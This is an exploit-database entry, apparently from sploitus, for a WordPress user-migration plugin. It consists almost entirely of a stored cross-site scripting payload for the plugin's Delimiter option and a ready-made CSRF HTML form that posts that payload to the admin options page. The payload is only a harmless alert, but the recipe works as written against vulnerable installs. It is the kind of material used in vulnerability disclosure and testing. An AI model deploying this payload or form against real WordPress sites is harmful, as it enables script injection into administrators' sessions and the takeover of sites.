Share
## https://sploitus.com/exploit?id=WPEX-ID:7915070F-1D9B-43C3-B01E-FEC35F633A4D
Add the following payload in the Delimiter option of the plugin (/wp-admin/tools.php?page=migrate_users&action=options): "><script>alert(/XSS/)</script>
Via a CSRF attack:
<html>
<body>
<form action="https://example.com/wp-admin/tools.php?page=migrate_users&action=options" method="POST">
<input type="hidden" name="options[delimiter]" value=',"><script>alert(/XSS/)</script>' />
<input type="hidden" name="options[limit]" value="10" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>